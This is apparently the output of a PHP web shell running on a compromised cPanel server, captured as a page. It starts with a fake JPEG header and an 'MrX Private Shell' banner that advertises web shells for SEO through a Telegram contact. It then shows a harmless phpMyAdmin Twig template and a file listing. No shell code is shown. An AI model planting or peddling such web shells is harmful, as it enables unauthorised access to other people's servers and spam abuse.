����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
use Twig\Environment;
use Twig\Error\LoaderError;
use Twig\Error\RuntimeError;
use Twig\Extension\CoreExtension;
use Twig\Extension\SandboxExtension;
use Twig\Markup;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityNotAllowedTagError;
use Twig\Sandbox\SecurityNotAllowedFilterError;
use Twig\Sandbox\SecurityNotAllowedFunctionError;
use Twig\Source;
use Twig\Template;
/* database/structure/change_prefix_form.twig */
class __TwigTemplate_f5f0082e6129a7d24bee141f4a6129f7 extends Template
{
private $source;
private $macros = [];
public function __construct(Environment $env)
{
parent::__construct($env);
$this->source = $this->getSourceContext();
$this->parent = false;
$this->blocks = [
];
}
protected function doDisplay(array $context, array $blocks = [])
{
$macros = $this->macros;
// line 1
yield "<form id=\"ajax_form\" action=\"";
yield PhpMyAdmin\Url::getFromRoute(($context["route"] ?? null));
yield "\" method=\"post\">
";
// line 2
yield PhpMyAdmin\Url::getHiddenInputs(($context["url_params"] ?? null));
yield "
<fieldset class=\"pma-fieldset input\">
<table>
<tr>
<td>";
yield _gettext("From");
// line 7
yield "</td>
<td>
<input type=\"text\" name=\"from_prefix\" id=\"initialPrefix\">
</td>
</tr>
<tr>
<td>";
yield _gettext("To");
// line 13
yield "</td>
<td>
<input type=\"text\" name=\"to_prefix\" id=\"newPrefix\">
</td>
</tr>
</table>
</fieldset>
</form>
";
return; yield '';
}
/**
* @codeCoverageIgnore
*/
public function getTemplateName()
{
return "database/structure/change_prefix_form.twig";
}
/**
* @codeCoverageIgnore
*/
public function isTraitable()
{
return false;
}
/**
* @codeCoverageIgnore
*/
public function getDebugInfo()
{
return array ( 61 => 13, 52 => 7, 43 => 2, 38 => 1,);
}
public function getSourceContext()
{
return new Source("", "database/structure/change_prefix_form.twig", "/usr/local/cpanel/base/3rdparty/phpMyAdmin/templates/database/structure/change_prefix_form.twig");
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| fd2b83234608eb75ec4b0d7728e7b0e4.php | File | 2.3 KB | 0644 |
|
| fddd1b733da4f42e7c6db6f938928c22.php | File | 2.12 KB | 0644 |
|